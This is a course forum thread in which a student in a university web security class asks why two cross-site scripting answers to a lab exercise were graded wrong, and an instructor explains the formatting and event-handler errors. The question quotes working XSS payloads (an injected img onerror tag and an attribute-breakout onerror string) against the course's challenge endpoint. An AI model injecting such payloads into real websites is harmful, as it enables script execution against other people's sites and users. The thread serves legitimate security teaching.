I have some questions regarding my grades for Exercise 4

Question

In Exercise 4, question 1e, I submitted the following answer:

https://websec.cs.uni-paderborn.de/websec/api/xss/challenge?verifier=8&firstname=Example&lastname=User&credit_card=DE%206666%206666%206666%206666&access_code=111&session_id=af324dfg345dg435fds&total=%22%3E%3Cimg%20src=x%20onerror=alert(document.location)%3E

Although this successfully triggered the alert, it was marked wrong

Additionally, in question 2c, I used :

?ifr=' onerror=alert(document.domain) x='

which also executes as intended, yet was also marked incorrect.

Could you please clarify why these responses were marked wrong despite producing the expected behavior?

(Edit: I reposted part of the question as a separate one to keep the exercise categories correct. -JR)

asked May 16, 2025 in ex04 by anonymous
edited May 16, 2025 by Jost Rossel

edit history

1 Answer

Jost Rossel · Answer 1 · 2025-05-16T11:13:33+0000

For 1e) you were supposed to provide the parameter URL encoded, not the whole URL. So the answer is in an incorrect format.

2c) does not work, because you use the onerror handler instead of onload. onerror is only used if the iframe cannot load the content, which it can, as example.com can be framed.

I have some questions regarding my grades for Exercise 4

Your comment on this question:

Your answer

1 Answer

Your comment on this answer: